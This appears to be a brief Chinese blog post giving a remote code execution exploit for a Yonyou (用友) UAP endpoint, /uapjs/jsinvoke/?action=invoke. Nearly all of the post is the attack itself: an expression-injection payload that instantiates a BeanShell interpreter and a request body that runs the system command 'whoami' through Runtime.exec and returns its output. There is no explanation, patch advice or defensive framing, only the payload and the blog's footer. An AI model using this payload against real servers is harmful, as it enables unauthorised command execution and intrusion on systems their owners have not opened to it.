用友/uapjs/jsinvoke/?action=invoke

${param.getClass().forName(param.bsh).newInstance().eval(param.cmd)}

bsh=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

posted @ 2023-07-16 23:14 匿名用户12 阅读(432) 评论(0) 编辑收藏举报

刷新页面返回顶部

版权所有 © 2019 yysfa 感谢博客园提供的平台
如果没有特别注明，本博客中的博文使用 CC-BY-4.0 许可证
您可以对本博客的内容进行修改和转载，但需要注明出处